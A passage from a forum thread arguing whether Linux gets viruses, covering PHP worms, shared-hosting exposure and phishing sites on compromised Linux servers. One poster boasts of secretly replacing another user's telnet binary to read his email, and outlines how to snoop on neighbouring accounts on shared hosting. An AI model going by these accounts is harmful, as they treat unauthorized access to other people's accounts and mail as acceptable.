    >>>>>>>>> Ignoramus17842 wrote:
    >>>>>>>>>> I am sorry to burst anyone's bubble, but there are linux viruses.
    >>>>>>>>>> A lot of them spread via bad PHP software. I have seen some in
    >>>>>>>>>> action. That's the reason why I avoid PHP where possible.
    >>>>>>>>>>
    >>>>>>>>> You're not bursting my bubble. Prove it. Show us a linux virus that
    >>>>>>>>> spreads via bad PHP software.
    >>>>>>>>
    >>>>>>>> http://www.theregister.co.uk/2006/02/20/linux_worm/
    >>>>>>>> http://vil.nai.com/vil/content/v_136821.htm
    >>>>>>>>
    >>>

    > http://www.pandasecurity.com/enterpr...prod=&entorno=
    >>>>>>>
    >>>>>>> Those old references do not actually prove these are Linux viruses or
    >>>>>>> worms. It would seem that if a Windows web server was running
    >>>>>>> three-year old unpatched PHP or CGI script, the result would be the
    >>>>>>> same.
    >>>>>>
    >>>>>> Sure. If a windows server was running that crap, it would be infected
    >>>>>> too. Which is the whole point.
    >>>>>
    >>>>> But it was not the point you were alluding to, which is, "but there are
    >>>>> linux viruses." No, they are web server application software
    >>>>> vulnerabilities, and not Linux vulns - or viruses.
    >>>>
    >>>> If Linux runs it, it is a Linux problem. phpbb is a part of some Linux
    >>>> distros.
    >>>>
    >>>>> A hacking attempt is not a virus, either. A PHP (Perl, ASP, C++,
    >>>>> DotNet, etc) security hole is not a virus, either.
    >>>>>
    >>>>> I would define a virus as a self-replicating 'program'.
    >>>>
    >>>> That's exactly what they are.
    >>>>
    >>>> They exploit the holes, start running on the hacked servers and look
    >>>> for more servers to hack.
    >>>>
    >>>>>>> Notice too, from your third link, that nearly all of the vulns are
    >>>>>>> cgi scripts. Still nothing to do with Linux.
    >>>>>>
    >>>>>> It has everything to do with linux if they run on Linux.
    >>>>>
    >>>>> See above. Hacking attempts do not "run on Linux."
    >>>>
    >>>> Yes they do. They run on those hacked servers.
    >>>>
    >>>>>>>> I run a webserver and frequently see those worms probing my
    >>>>>>>> webserver. I do not get infected since I have a anti-PHP policy.
    >>>>>>>
    >>>>>>> Does that mean you don't use PHP in the sites you write? Or don't
    >>>>>>> visit sites made with PHP?
    >>>>>>
    >>>>>> That means that I do not use PHP on any server that I host, with the
    >>>>>> exception of mediawiki.
    >>>>>
    >>>>> ..so "I do not use PHP" is not true, then. If you use that wiki, PHP
    >>>>> is installed - and available - on your server. You'd better be careful!
    >>>>
    >>>> I am trying to be careful indeed and do not run any PHP stuff other
    >>>> than Mediawiki.
    >>>>
    >>>>>>> I use hand-coded PHP for all my sites, and with no third-party
    >>>>>>> scripts or "cgi", and have yet to discover a vulnerability. Yes,
    >>>>>>> they are all hosted on Linux servers running cPanel.
    >>>>>>
    >>>>>> If no one knows what code you are writing, you most likely will be
    >>>>>> safe from automated attacks. But if your hand written code has
    >>>>>> vulnerabilities, and someone wants to hack you specifically, chances
    >>>>>> are good that you will be hacked.
    >>>>>
    >>>>> Well, it hasn't happened in many years...
    >>>>>
    >>>>>> Also if you are on shared hosting, most likely other users of that
    >>>>>> hosting would be able to see the source code of your script.
    >>>>>
    >>>>> I disagree with that statement.
    >>>>
    >>>> Give it a try. Try to write a PHP or perl CGI script that would get a
    >>>> listing of the directory one level above your home directory. Then see
    >>>> if subdirectories of that place have known sub-subdirectories such as
    >>>> public_html or whatever you can guess based on the naming convention
    >>>> that your ISP has for mapping websites to directories.
    >>>>
    >>>> Then find out the websites that run on the same IP as you (there are
    >>>> web sites to help you do this).
    >>>>
    >>>> Go from there.
    >>>>
    >>>>>> I hacked a user of panix.com 12 years ago
    >>>>>
    >>>>> ..and the security hole you used hasn't been patched yet, right?
    >>>>
    >>>> My hack was based on a user mistake and not on any security hole.
    >>>>
    >>>>
    >>>>>> because they set up wrong permissions on telnet binary that they
    >>>>>> uploaded to their account ~/bin/telnet (telnetting to outside was
    >>>>>> against panix policy and /usr/bin/telnet was mode 710). I then
    >>>>>> changed it to a altered version that was to run a script that I wrote
    >>>>>> to set other permissions to read his email. I am not a pro hacker
    >>>>>> either, it was just a USENET asshole on whom I needed some intel.
    >>>>>
    >>>>> Ah. So it wasn't a Linux vuln, or a PHP vuln, but a user shooting
    >>>>> himself in the foot by not setting up his web site or host correctly.
    >>>>> Still not a Linux vuln.
    >>>>
    >>>> No. But it is a good illustration tat getting ****y is a mistake.
    >>>>
    >>>>>> If you are on shared hosting, source code of your scripts is almost
    >>>>>> publicly available (to anyone with $12 to sign up for a month), as,
    >>>>>> most likely, are your database credentials.
    >>>>>
    >>>>> I've used shared hosting for ten years and never been hacked, nor have
    >>>>> my databases.
    >>>>
    >>>> So give the above experiment a try.
    >>>>
    >>>>>>> Your references would be valid (except for the Linux part) for web
    >>>>>>> authors still using Matt Wright's ten year old insecure formmail
    >>>>>>> script, for example.
    >>>>>>
    >>>>>> And a lot of other things.
    >>>>>
    >>>>> I did say Matt's well-known bad script, "for example." I regularly get
    >>>>> requests for "cgi/formmail.pl" - which of course does not exist.
    >>>>>
    >>>>>> Security is not simple and PHP is making it very difficult to be
    >>>>>> secure.
    >>>>>
    >>>>> No, of course it is not simple. But your arguments are flawed,
    >>>>> especially when trying to prove "it's a Linux virus."
    >>>>>
    >>>>>> Linux systems are not impervious to viruses. To think otherwise is to
    >>>>>> delude oneself and to invite trouble.
    >>>>>
    >>>>> I've been using Linux at home for about two years and haven't found any
    >>>>> problem with my computers...
    >>>>>
    >>>>
    >>>> I have been using Linux for 13 years (since 1995) and was not hacked
    >>>> either.
    >>>>
    >>>> i
    >>>
    >>> Then you're blowing smoke, aren't you? Why? is the next question.
    >>>
    >>> Cheers.
    >>>

    >>
    >> I am trying to educate you. Don't think that just because you have
    >> Linux installed, you will never get hacked. That's dangerous
    >> thinking that is incorrect and leads to trouble.
    >>

    > You can start by trying to educate yourself. Mission Impossible?
    >
    >> Try this:
    >>
    >> http://www.theregister.co.uk/2007/10...nline_banking/
    >>
    >> ``At one point, he said, the bank spent a month as the largest
    >> phishing target in the country, and in fighting this ongoing problem,
    >> it has shutdown countless phishing sites surreptitiously installed on
    >> countless machines across the net.
    >>
    >> "These things are incredibly sophisticated, and when they take over a
    >> computer, most [users] don't know it," he said. "With every single
    >> phishing site [Washington Mutual has] shutdown, not one person was
    >> aware been aware that their machine was compromised and used for
    >> phishing. That includes university servers and company servers and
    >> personal PCs and all sorts of things."
    >>
    >> More interesting is that most of the compromised machines were not
    >> Windows machines. "The vast majority of [the phishing sites] we saw
    >> were on rootkit-ed Linux boxes, which was rather startling. We
    >> expected a predominance of Microsoft boxes and that wasn't the case."
    >>
    >> This pleased Microsoft's head of Silicon Valley PR, who served as a
    >> conference sponsor.
    >>
    >> Botnets are obviously a big problem for eBay as well, but Cullinane
    >> wouldn't quite say how big. "We see botnet attacks that are massive in
    >> their size and scope. We did a preliminary analysis and found over - I
    >> guess I'm not supposed to say that, what the number is - but we found
    >> a huge number of bots aimed specifically at eBay, trying to do things
    >> specifically to us."
    >>
    >> The problem has become so bad that eBay operates under the assumption
    >> that every personal PC is infected, he says. "With the desktop, we're
    >> starting to run on the assumption that anyone who's trying to contact
    >> us from their own personal desktop is probably coming from a
    >> compromised computer." ''
    >> i

    >
    > Totally irrelevant. Nothing to do with Linux getting viruses. Possibly has
    > something to do with DOS attacks from compromised Windoze boxes, but that's
    > another story.
    >


    Did you understand that phishing websites were running on compromised
    Linux servers?

    DOS attacks were not at all mentioned in the article.

    i

  20. Re: Ubuntu & Antivirus

    Ignoramus17842 wrote:

    > Did you understand that phishing websites were running on compromised
    > Linux servers?



    Phishing sites are set up to phish. It matters not on what OS the
    Webserver runs.

    The Linux servers aren't "compromised" at all. They are designed to
    phish. The phishers just happened to choose a good OS for their shady
    operation.

    Your grasp of "phishing" is just as irrelevant as your grasp of "virus."

    Please spend some time learning something and stop wasting everybody
    else's time.


    --
    John

    No Microsoft, Apple, Intel, Trend Micro, nor Ford products were used in the preparation or transmission of this message.

    The EULA sounds like it was written by a team of lawyers who want to tell me what I can't do. The GPL sounds like it was written by a human being, who wants me to know what I can do.

+ Reply to Thread
Page 4 of 7 FirstFirst ... 2 3 4 5 6 ... LastLast